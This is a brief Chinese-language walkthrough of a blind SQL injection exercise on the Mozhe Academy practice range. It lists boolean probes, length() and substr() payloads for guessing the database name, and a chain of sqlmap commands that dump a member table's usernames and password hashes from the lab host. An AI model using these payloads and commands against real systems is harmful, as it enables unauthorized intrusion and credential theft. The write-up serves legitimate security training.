0x00
這邊我用的是墨者學院的靶場
https://www.mozhe.cn/bug/detail/UDNpU0gwcUhXTUFvQm9HRVdOTmNTdz09bW96aGUmozhe
0x01
下面我進入靶場需要登錄
由於沒有賬號密碼弱口令也不行
所以判斷不需要登錄注入點可以尋找到
這個通知點擊進去就是注入點
輸入and 1=1 and 1=2 進行驗證
0x02
然后在利用語句來判斷數據庫庫名長度
id=1 and length(database())>=1
上面語句的意思是判斷數據庫名長度有沒有大於等於1,這里面1是可變量
返回結果如下
返回正常,證明數據庫庫名長度大於等於1
11時返回不正常
10返回正常
由此可得數據庫庫名長度為10位
接着使用逐字符判斷的方式來獲取數據庫庫名
數據庫庫名一般在a-z 1-9
可能還有一些特殊字符這里字母不分大小寫逐字符判斷的SQL語句如下
and substr (database(),1,1)='t'
substr是截取的意思就是截取database()第一個字符的意思
這邊我用burp爆破一下
可以得出第一位數為s
由此類推了,推出數據庫的名字為stormgroup
然后.....
還是直接sqlmap
0x03
sqlmap -u "http://219.153.49.228:43381/new_list.php?id=1" --dbs
爆出來數據庫名
sqlmap -u "http://219.153.49.228:43381/new_list.php?id=1" -D stormgroup --tables
爆表
sqlmap -u "http://219.153.49.228:43381/new_list.php?id=1" -D stormgroup -T member --columns
爆字段
sqlmap -u "http://219.153.49.228:43381/new_list.php?id=1" -D stormgroup -T member -C "name,password" --dump
爆值
md5解密密碼
下面這個是正確賬號登陸拿key提交
最后說一句:sqlmap真香